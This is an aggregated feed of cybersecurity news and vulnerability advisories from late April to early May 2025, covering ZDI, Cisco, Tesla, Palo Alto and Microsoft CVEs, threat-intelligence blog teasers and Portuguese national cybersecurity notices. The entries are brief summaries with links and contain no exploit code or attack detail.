https://www.s-rminform.com/latest-thinking/from-scandals-to-solar-panels-spains-path-to-resilience
ZDI-25-269: (Pwn2Own) Synology BeeStation BST150-4T Unnecessary Privileges Remote Code Execution Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology BeeStation BST150-4T devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2024-10445.

http://www.zerodayinitiative.com/advisories/ZDI-25-269/
ZDI-25-270: Cisco IOS XE SNMP GET-NEXT ciscoFlashFileSize Unexpected Sign Extension Denial-of-Service Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-20169.

http://www.zerodayinitiative.com/advisories/ZDI-25-270/
ZDI-25-271: Cisco IOS XE SNMP OID Handling Out-Of-Bounds Read Denial-of-Service Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-20172.

http://www.zerodayinitiative.com/advisories/ZDI-25-271/
ZDI-25-272: Cisco IOS XE SNMP OID Handling Out-Of-Bounds Read Denial-of-Service Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-20172.

http://www.zerodayinitiative.com/advisories/ZDI-25-272/
ZDI-25-273: Cisco IOS XE SNMP OID Handling Out-Of-Bounds Read Denial-of-Service Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-20172.

http://www.zerodayinitiative.com/advisories/ZDI-25-273/
ZDI-25-274: Cisco IOS XE SNMP OID Handling Out-Of-Bounds Read Denial-of-Service Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-20172.

http://www.zerodayinitiative.com/advisories/ZDI-25-274/
ZDI-25-275: Cisco IOS XE SNMP GET-NEXT callHomeUserDefCmdName Unexpected Sign Extension Denial-of-Service Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-20171.

http://www.zerodayinitiative.com/advisories/ZDI-25-275/
ZDI-25-276: Cisco IOS XE SNMP GET-NEXT cilmCurrentImageLevel Stack-based Buffer Overflow Remote Code Execution Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-20174.

http://www.zerodayinitiative.com/advisories/ZDI-25-276/
ZDI-25-277: Cisco IOS XE SNMP SET cewEventTime Stack-based Buffer Overflow Remote Code Execution Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-20175.

http://www.zerodayinitiative.com/advisories/ZDI-25-277/
ZDI-25-278: Cisco IOS XE SNMP GET-NEXT ctspIpSgtValue Stack-based Buffer Overflow Remote Code Execution Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-20176.

http://www.zerodayinitiative.com/advisories/ZDI-25-278/
ZDI-25-279: Cisco IOS XE SNMP GET-NEXT cContextMappingBridgeDomainIdentifier Buffer Overflow Remote Code Execution Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-20173.

http://www.zerodayinitiative.com/advisories/ZDI-25-279/
ZDI-25-280: Cisco IOS XE SNMP GET-NEXT ciscoFlashChipCode Unexpected Sign Extension Denial-of-Service Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-20170.

http://www.zerodayinitiative.com/advisories/ZDI-25-280/
ZDI-25-281: Cisco IOS XE SNMP SET cewProxyClass Stack-based Buffer Overflow Remote Code Execution Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco IOS XE. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-20175.

http://www.zerodayinitiative.com/advisories/ZDI-25-281/
ZDI-25-282: Webmin CRLF Injection Privilege Escalation Vulnerability
2025-05-01T05:00:00Z | 1746075600

This vulnerability allows remote attackers to escalate privileges on affected installations of Webmin. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-2774.

http://www.zerodayinitiative.com/advisories/ZDI-25-282/
TerraStealerV2 and TerraLogger: Golden Chickens' New Malware Families Discovered
2025-05-01T00:00:00Z | 1746057600

Insikt Group reveals two emerging malware strains—TerraStealerV2 and TerraLogger—linked to Golden Chickens, a threat actor behind credential theft and keylogging MaaS platforms. Learn how these tools operate and evolve.

https://www.recordedfuture.com/research/terrastealerv2-and-terralogger
RSAC 2025 Expo Recap: Goats, Puppies, and Threat Intelligence
2025-05-01T00:00:00Z | 1746057600

There was much to see at RSAC 2025. Read the recap about a few highlights from the expo floor.

https://www.recordedfuture.com/blog/rsac-recap
Inaugurado Centro de Competências em Cibersegurança da Madeira
2025-05-01T00:00:00Z | 1746057600

Na manhã do dia 29 de abril foi inaugurado, oficialmente, o espaço do Centro de Competências em Cibersegurança da Madeira (CCC Madeira), situado no Funchal. Integrado na rede C-Network, dinamizada pelo Centro Nacional de Cibersegurança (CNCS), o CCC Madeira visa apoiar, até 2026, cerca de 129 entidades regionais da Administração Pública e PMES, promovendo a resiliência digital da região autónoma.O CCC Madeira resulta de um consórcio que integra a Associação Comercial e Industrial do Funchal – Câmara de Comércio e Indústria da Madeira, a Associação de Municípios da Região Autónoma da Madeira, a Agência Regional para o Desenvolvimento da Investigação, Tecnologia e Inovação (Arditi), a Universidade da Madeira e a StartUP Madeira. Na cerimónia informal de inauguração do CCC Madeira estiveram presentes, o Secretário Regional das Finanças, Duarte Freitas e do Diretor do Gabinete Regional para a Conformidade Digital, Proteção de Dados e Cibersegurança e líder do consórcio, Martin Freitas, bem como dos membros do consórcio. Durante a tarde, o Auditório do Museu Casa da Luz, foi palco da conferência “Madeira, a cibersegurança está mais perto”, um evento paralelo destinado às entidades regionais que podem obter apoio junto do CCC Madeira.  A abertura ficou a cargo do coordenador do CNCS, Lino Santos, que participou à distância, tendo realçado a importância estratégica da rede C-Network e do CCC Madeira para, no terreno, apoiar as entidades e promover o aumento da maturidade em cibersegurança e a resiliência digital do país, descentralizando e aumentando o alcance da atuação do CNCS. O Secretário Regional das Finanças, Duarte Freitas, falou da cibersegurança como uma prioridade do Governo Regional da Madeira, justificando o reforço e a aposta contínua que tem sido feita neste domínio, nomeadamente com o CCC Madeira, que não se trata de um projeto isolado, mas sim de “uma continuidade coerente de um compromisso estratégico para uma Madeira mais resiliente”. No encerramento da conferência, também com participação à distância, o Diretor-Geral do Gabinete Nacional de Segurança, Almirante António Gameiro Marques, destacou as competências únicas entidades que integram consórcio, “complementares e estratégicas para o sucesso do CCC Madeira”, bem como a relevância estratégica deste Centro face aos desafios do contexto de ameaças de tendências que afetam o ciberespaço de interesse nacional.  

https://dyn.cncs.gov.pt/pt/detalhe/art/135923/inaugurado-centro-de-competencias-em-ciberseguranca-da-madeira
Combata a desinformação, não partilhe notícias falsas
2025-05-01T00:00:00Z | 1746057600

Perante a circulação de desinformação que ocorre nas circunstâncias associadas à falha na rede elétrica nacional, aconselhamos a consulta ou confirmação de informação junto de fontes oficiais e confiáveis. A desinformação é, também, um problema de cibersegurança, sobretudo, porque os meios digitais proporcionam a sua disseminação.Antes de clicar ou partilhar, verifique a fonte e cruze a informação:Consulte fontes oficiais e confiáveis;Leia a totalidade das notícias antes de partilhar;Desconfie de títulos sensacionalistas;Quando alguém partilhar uma notícia, verifique se o link é autêntico;O uso da Inteligência Artificial traz maior sofisticação à desinformação pela capacidade de simular imagens, vozes e textos, que parecem verdadeiros. Compare com outras fontes.

https://dyn.cncs.gov.pt/pt/detalhe/art/135924/combata-a-desinformacao-nao-partilhe-noticias-falsas
Secure64 is now listed as a protective DNS Vendor allow simple content control and protection from cyber attacks
2025-04-30T22:02:34Z | 1746050554

Secure64 has been listed by the Cybersecurity and Infrastructure Security Agency as a vendor that can supply a Protective DNS platform. LineGuard delivers Safety and Security for Enterprises and carriers across the globe. Advanaced features include Malware, Cyber attacks and Security Threat Protection as well as blocking access to 500 app categories and content categories. […]

https://secure64.com/2025/04/30/secure64-is-now-listed-as-a-protective-dns-vendor-allow-simple-content-control-and-protection-from-cyber-attacks/
Alleged ‘Scattered Spider’ Member Extradited to U.S.
2025-04-30T21:54:59Z | 1746050099

A 23-year-old Scottish man thought to be a member of the prolific Scattered Spider cybercrime group was extradited last week from Spain to the United States, where he is facing charges of wire fraud, conspiracy and identity theft. U.S. prosecutors allege Tyler Robert Buchanan and co-conspirators hacked into dozens of companies in the United States and abroad, and that he personally controlled more than $26 million stolen from victims.

https://krebsonsecurity.com/2025/04/alleged-scattered-spider-member-extradited-to-u-s/
Critical vulnerability in SAP NetWeaver enables malicious file uploads
2025-04-30T20:38:55Z | 1746045535

Adversaries can exploit CVE-2025-31324 to upload web shells and other unauthorized files to execute on the SAP NetWeaver server

https://redcanary.com/blog/threat-intelligence/cve-2025-31324/
Level-up Splunk with Silent Push IOFA™ data
2025-04-30T18:49:47Z | 1746038987

Challenge: Operationalizing large amounts of CTI data at scale  A leading U.S.-based finance company was facing difficulties correlating the large amounts of threat intelligence data that the organization collected via Splunk.  Our customer needed to pass noisy Splunk data streams through a series of high-confidence validations to produce true positive alerts, across a range of […] The post Level-up Splunk with Silent Push IOFA™ data  appeared first on Silent Push.

https://www.silentpush.com/blog/splunk-integration/
CVE-2024-5916 PAN-OS: Cleartext Exposure of External System Secrets (Severity: MEDIUM)
2025-04-30T18:00:00Z | 1746036000

CVE-2024-5916 PAN-OS: Cleartext Exposure of External System Secrets (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2024-5916
CVE-2024-3596 PAN-OS: CHAP and PAP When Used with RADIUS Authentication Lead to Privilege Escalation (Severity: MEDIUM)
2025-04-30T17:45:00Z | 1746035100

CVE-2024-3596 PAN-OS: CHAP and PAP When Used with RADIUS Authentication Lead to Privilege Escalation (Severity: MEDIUM)

https://security.paloaltonetworks.com/CVE-2024-3596
CVE-2024-5920 PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator (Severity: LOW)
2025-04-30T17:45:00Z | 1746035100

CVE-2024-5920 PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in PAN-OS Enables Impersonation of a Legitimate Administrator (Severity: LOW)

https://security.paloaltonetworks.com/CVE-2024-5920
CVE-2024-9468 PAN-OS: Firewall Denial of Service (DoS) via a Maliciously Crafted Packet (Severity: HIGH)
2025-04-30T17:45:00Z | 1746035100

CVE-2024-9468 PAN-OS: Firewall Denial of Service (DoS) via a Maliciously Crafted Packet (Severity: HIGH)

https://security.paloaltonetworks.com/CVE-2024-9468
525,600 Assessments Later — Top Mobile App Risks Since 2022
2025-04-30T17:35:00Z | 1746034500

Every smartphone in the world today is a potential spy equipped with more than 18 sensors like GPS, accelerometer, gyroscope and microphone that can be weaponized by cyberattackers who take advantage of poorly secured mobile apps. With more than 7.2 billion smartphones in use and 255 billion app downloads in 2023 alone, the global mobile […] The post 525,600 Assessments Later — Top Mobile App Risks Since 2022 appeared first on NowSecure.

https://www.nowsecure.com/blog/2025/04/30/525600-assessments-later-top-mobile-app-risks-since-2022/
Huawei Releases AI Data Lake Solution, Positioned to Accelerate Industry Intelligence
2025-04-30T15:32:00Z | 1746027120

On April 29, 2025, at the 4th Huawei Innovative Data Infrastructure (IDI) Forum in Munich, Germany, Huawei launched the AI Data Lake Solution

//www.huawei.com/en/news/2025/4/idi-forum-data-lake-solution
Joint guidance on software security code of practice
2025-04-30T15:30:42Z | 1746027042

https://cyber.gc.ca/en/news-events/joint-guidance-software-security-code-practice
SonicWall SMA1000 SSRF Vulnerability
2025-04-30T14:26:04Z | 1746023164

A Server-side request forgery (SSRF) vulnerability has been identified in the SMA1000 Appliance Work Place interface, which in specific conditions could potentially enable a remote unauthenticated attacker to cause the appliance to make requests to an unintended location.IMPORTANT: SonicWall PSIRT strongly advises users of the SMA1000 product to upgrade to the latest hotfix release version to address the vulnerability.Please note that SonicWall Firewall and SMA 100 series products are not affected by this vulnerability. CVE: CVE-2025-2170 Last updated: April 30, 2025, 2:26 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0008
Security alert SAP CVE-2025-31324: Stormshield Products Response
2025-04-30T14:17:29Z | 1746022649

A new critical authentication bypass vulnerability impacting the platform SAP NetWeaver from SAP has been reported. It has been assigned the reference CVE-2025-31324 and a CVSS 3.1 score of 10. This flaw impacts the following version of the application: NetWeaver (Visual Composer development server) VCFRAMEWORK... The post Security alert SAP CVE-2025-31324: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-sap-cve-2025-31324-stormshield-products-response/
Security alert SAP CVE-2025-31324: Stormshield Products Response
2025-04-30T14:17:29Z | 1746022649

A new critical authentication bypass vulnerability impacting the platform SAP NetWeaver from SAP has been reported. It has been assigned the reference CVE-2025-31324 and a CVSS 3.1 score of 10. This flaw impacts the following version of the application: NetWeaver (Visual Composer development server) VCFRAMEWORK... The post Security alert SAP CVE-2025-31324: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-sap-cve-2025-31324-stormshield-products-response/
The Critical Role of Third-Party Risks in Protecting Healthcare
2025-04-30T14:00:00Z | 1746021600

Cyber threats targeting healthcare are not just a nuisance, they are life-threatening attacks on critical infrastructure. In a recent webinar between RiskRecon and the American Hospital Association (AHA), an engaging dialogue unfolded around the evolving tactics of cybercriminals, the growing burden on hospitals and vendors alike, and the pressing need for better third-party risk management.

https://blog.riskrecon.com/the-critical-role-of-third-party-risks-in-protecting-healthcare
Agent of Chaos: Hijacking NodeJS’s Jenkins Agents
2025-04-30T13:43:50Z | 1746020630

Relationships are complicated. When multiple DevOps platforms work together to execute pipelines for a single GitHub repository, it begs the question: Do these platforms get along? Node.js, the most popular JavaScript runtime in the world, uses a set of triplets to execute its CI/CD pipelines: a GitHub App, GitHub Actions workflows, and Jenkins pipelines. Like […] The post Agent of Chaos: Hijacking NodeJS’s Jenkins Agents appeared first on Praetorian.

https://www.praetorian.com/blog/agent-of-chaos-hijacking-nodejss-jenkins-agents/
Getting ready for AI in the RAN
2025-04-30T13:00:00Z | 1746018000

As networks evolve toward higher performance and efficiency, AI is rapidly becoming a critical tool to support and enable this transformation across the end-to-end infrastructure, including the RAN. With growing network complexity due to technological advances, a more open vendor ecosystem, increased traffic volume...

https://www.netscout.com/blog/getting-ready-ai-ran
Analyzing LummaStealer’s FakeCAPTCHA Delivery Tactics
2025-04-30T12:41:07Z | 1746016867

Paste, Click, Compromised The post Analyzing LummaStealer’s FakeCAPTCHA Delivery Tactics appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/analyzing-lummastealers-fakecaptcha-delivery-tactics/
Drag and Pwnd: Leverage ASCII characters to exploit VS Code
2025-04-30T12:37:11Z | 1746016631

Control characters like SOH, STX, EOT and ETX were never meant to run your code - but in the world of modern terminal emulators, they sometimes do. In this post, I'll dive into the forgotten mechanics

https://portswigger.net/research/drag-and-pwnd-leverage-ascii-characters-to-exploit-vs-code
Cyber Weather March 2025
2025-04-30T11:43:02Z | 1746013382

Cyber weather in March was partly cloudy, with vulnerabilities, scams, and account hijackings casting shadows. However, a few rays of sunshine and early signs of spring appeared in network performance and regulatory developments.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_03/2025
Cyber Weather March 2025
2025-04-30T11:43:02Z | 1746013382

Cyber weather in March was partly cloudy, with vulnerabilities, scams, and account hijackings casting shadows. However, a few rays of sunshine and early signs of spring appeared in network performance and regulatory developments.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_03/2025
APT Detection in OT Environments: Using Deception to Block Unauthorized Access
2025-04-30T09:37:24Z | 1746005844

Operational Technology (OT) environments are the backbone of critical infrastructure. From power grids and manufacturing plants to water treatment facilities and transportation networks, these systems enable essential services to function seamlessly. As Advanced Persistent Threat (APT) actors adapt their tactics to exploit the convergence of IT and OT, securing these environments requires a proactive, intelligence-driven […] The post APT Detection in OT Environments: Using Deception to Block Unauthorized Access appeared first on CounterCraft.

https://www.countercraftsec.com/blog/apt-detection-ot-deception-security/
Spain and Portugal Power Outages: Real-Time Observations and Service Continuity Through Cato SASE Cloud Platform
2025-04-30T09:13:51Z | 1746004431

Introduction On Monday, April 28, 2025, widespread power outages affected large parts of Spain and Portugal. The exact root cause is still under investigation. These disruptions impacted regional infrastructure supporting connectivity, cloud services, and on-site operations. This report provides a technical overview of the network behavior we observed across the Cato SASE Cloud in real... The post Spain and Portugal Power Outages: Real-Time Observations and Service Continuity Through Cato SASE Cloud Platform appeared first on Cato Networks.

https://www.catonetworks.com/blog/spain-and-portugal-power-outages-real-time-observations-and-service-continuity-through-cato-sase-cloud-platform/
TheWizards APT group uses SLAAC spoofing to perform adversary-in-the-middle attacks
2025-04-30T09:00:00Z | 1746003600

ESET researchers analyzed Spellbinder, a lateral movement tool used to perform adversary-in-the-middle attacks

https://www.welivesecurity.com/en/eset-research/thewizards-apt-group-slaac-spoofing-adversary-in-the-middle-attacks/
What’s New Device Platform Intelligence on Apr 30, 2025
2025-04-30T08:04:11Z | 1746000251

Go to Device Platform Intelligence Added Platforms 117 Platforms are added Platform Name Node Type2 Node Type AXIS M3105-L Network Camera Security Camera Security Appliance AXIS M3106-L Network Camera Security Camera Security Appliance Alcatel-Lucent OmniSwitch 6360-PH24 Switch Switch Switch Alien Technology ALR-9800-KOR RFID Reader ICS/OT IoT/OT ApplianSys DNSBOX400 Management System Networking Device Server AsusTek ROG […]

https://www.genians.com/dpi/dpi-update-notice/device-platform-intelligence-update-notice-apr-30-2025/
Insecure credential storage plagues MCP
2025-04-30T07:00:00Z | 1745996400

This post describes how many examples of MCP software store long-term API keys for third-party services in plaintext on the local filesystem, often with insecure, world-readable permissions.

https://blog.trailofbits.com/2025/04/30/insecure-credential-storage-plagues-mcp/
CVE-2025-21416 Azure Virtual Desktop Elevation of Privilege Vulnerability
2025-04-30T07:00:00Z | 1745996400

Missing authorization in Azure Virtual Desktop allows an authorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21416
CVE-2025-30392 Azure AI bot Elevation of Privilege Vulnerability
2025-04-30T07:00:00Z | 1745996400

Improper authorization in Azure Bot Framework SDK allows an unauthorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30392
CVE-2025-30390 Azure ML Compute Elevation of Privilege Vulnerability
2025-04-30T07:00:00Z | 1745996400

Improper authorization in Azure allows an authorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30390
CVE-2025-33074 Azure Functions Remote Code Execution Vulnerability
2025-04-30T07:00:00Z | 1745996400

Improper verification of cryptographic signature in Microsoft Azure Functions allows an authorized attacker to execute code over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33074
CVE-2025-30389 Azure Bot Framework SDK Elevation of Privilege Vulnerability
2025-04-30T07:00:00Z | 1745996400

Improper authorization in Azure Bot Framework SDK allows an unauthorized attacker to elevate privileges over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30389
CVE-2025-30391 Microsoft Dynamics Information Disclosure Vulnerability
2025-04-30T07:00:00Z | 1745996400

Improper input validation in Microsoft Dynamics allows an unauthorized attacker to disclose information over a network.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-30391
ZDI-CAN-26902: Wondershare
2025-04-30T05:00:00Z | 1745989200

A CVSS score 9.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N severity vulnerability discovered by 'Alfredo Oliveira and David Fiser of Trend Research' was reported to the affected vendor on: 2025-04-30, 37 days ago. The vendor is given until 2025-08-28 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26777: Adobe
2025-04-30T05:00:00Z | 1745989200

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-30, 37 days ago. The vendor is given until 2025-08-28 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-25-257: (Pwn2Own) Oracle VirtualBox OHCI USB Controller Race Condition Local Privilege Escalation Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows local attackers to escalate privileges on affected installations of Oracle VirtualBox. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.2. The following CVEs are assigned: CVE-2024-21113.

http://www.zerodayinitiative.com/advisories/ZDI-25-257/
ZDI-25-258: (Pwn2Own) Adobe Acrobat Reader DC distributionURL JavaScript API Restrictions Bypass Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows remote attackers to bypass JavaScript API restrictions on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-34099.

http://www.zerodayinitiative.com/advisories/ZDI-25-258/
ZDI-25-259: (Pwn2Own) Adobe Acrobat Reader DC Collab Command Injection Remote Code Execution Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adobe Acrobat Reader DC. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-34098.

http://www.zerodayinitiative.com/advisories/ZDI-25-259/
ZDI-25-260: (Pwn2Own) Tesla Model S Iris Modem Race Condition Firewall Bypass Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows network-adjacent attackers to bypass the firewall on the Iris modem in affected Tesla Model S vehicles. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.0. The following CVEs are assigned: CVE-2024-6029.

http://www.zerodayinitiative.com/advisories/ZDI-25-260/
ZDI-25-261: (Pwn2Own) Tesla Model S oFono AT Command Heap-based Buffer Overflow Code Execution Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows local attackers to execute arbitrary code on affected Tesla Model S vehicles. An attacker must first obtain the ability to execute code on the target modem in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-6031.

http://www.zerodayinitiative.com/advisories/ZDI-25-261/
ZDI-25-262: (Pwn2Own) Tesla Model S Iris Modem QCMAP_ConnectionManager Improper Input Validation Sandbox Escape Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows local attackers to escape the sandbox on affected affected Tesla Model S vehicles. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-13943.

http://www.zerodayinitiative.com/advisories/ZDI-25-262/
ZDI-25-263: (Pwn2Own) Tesla Model S oFono Unnecessary Privileges Sandbox Escape Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows local attackers to escape the sandbox on affected Tesla Model S vehicles. An attacker must first obtain the ability to execute code within the sandbox on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.0. The following CVEs are assigned: CVE-2024-6030.

http://www.zerodayinitiative.com/advisories/ZDI-25-263/
ZDI-25-264: (Pwn2Own) Tesla Model S Iris Modem ql_atfwd Command Injection Code Execution Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows local attackers to execute arbitrary code on affected Tesla Model S vehicles. An attacker must first obtain the ability to execute code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-6032.

http://www.zerodayinitiative.com/advisories/ZDI-25-264/
ZDI-25-265: (Pwn2Own) Tesla Model 3 VCSEC Integer Overflow Remote Code Execution Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected Tesla Model 3 vehicles. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-2082.

http://www.zerodayinitiative.com/advisories/ZDI-25-265/
ZDI-25-266: Apache ActiveMQ NMS Body Deserialization of Untrusted Data Remote Code Execution Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apache ActiveMQ NMS. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The ZDI has assigned a CVSS rating of 8.1. The following CVEs are assigned: CVE-2025-29953.

http://www.zerodayinitiative.com/advisories/ZDI-25-266/
ZDI-25-267: GStreamer H265 Codec Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-3887.

http://www.zerodayinitiative.com/advisories/ZDI-25-267/
ZDI-25-268: GStreamer Incorrect Permission Assignment Local Privilege Escalation Vulnerability
2025-04-30T05:00:00Z | 1745989200

This vulnerability allows local attackers to escalate privileges on affected installations of GStreamer. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.0. The following CVEs are assigned: CVE-2025-2759.

http://www.zerodayinitiative.com/advisories/ZDI-25-268/
Security Alert (A25-04-25): Multiple Vulnerabilities in Google Chrome
2025-04-30T04:00:00Z | 1745985600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-04-26): Multiple Vulnerabilities in Firefox
2025-04-30T04:00:00Z | 1745985600

Mozilla has published the advisories (MFSA2025-28, MFSA2025-29, and MFSA2025-30) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Cyber Centre welcomes round 2 of NIST’s additional digital signature scheme standardization process
2025-04-29T19:40:12Z | 1745955612

https://cyber.gc.ca/en/news-events/cyber-centre-welcomes-round-2-nists-additional-digital-signature-scheme-standardization-process
Cutting through the noise: How to prioritize Dependabot alerts
2025-04-29T16:00:39Z | 1745942439

Learn how to effectively prioritize alerts using severity (CVSS), exploitation likelihood (EPSS), and repository properties, so you can focus on the most critical vulnerabilities first. The post Cutting through the noise: How to prioritize Dependabot alerts appeared first on The GitHub Blog.

https://github.blog/security/application-security/cutting-through-the-noise-how-to-prioritize-dependabot-alerts/
Enhancing NETSCOUT Solutions for AIOps, SecOps, NetOps, and DevOps in Azure
2025-04-29T16:00:00Z | 1745942400

As digital transformation accelerates and AI/ML adoption expands, organizations increasingly depend on actionable metadata to improve service assurance, observability, and cybersecurity. AIOps, SecOps, NetOps, and DevOps teams rely on high-quality, real-time data to train AI models that reduce mean time to resolution...

https://www.netscout.com/blog/enhancing-netscout-solutions-aiops-secops-netops-and-devops
WarGames – it’s not 1983 anymore
2025-04-29T15:59:04Z | 1745942344

China’s state-sponsored cyber operations, driven by groups like Volt Typhoon, Salt Typhoon, Brass Typhoon, and APT41, and amplified by techniques like Fast Flux DNS, are not chasing Hollywood apocalypse—they’re seizing America’s networks, turning our infrastructure into a weapon against us.

https://mixmode.ai/blog/wargames-its-not-1983-anymore/
RSAC 2025: Hillstone Networks Named Market Innovator for AI-Powered Cybersecurity Solutions
2025-04-29T15:00:00Z | 1745938800

SANTA CLARA, Calif. – Hillstone Networks, a leading provider of innovative cybersecurity solutions, is proud to announce it has been recognized by Cyber Defense Magazine (CDM) as the Market Innovator in AI-Powered Cybersecurity Solutions at the 13th Annual Global InfoSec Awards, presented during RSA Conference 2025. “This recognition is a clear reflection of the hard […] The post RSAC 2025: Hillstone Networks Named Market Innovator for AI-Powered Cybersecurity Solutions appeared first on Hillstone Networks.

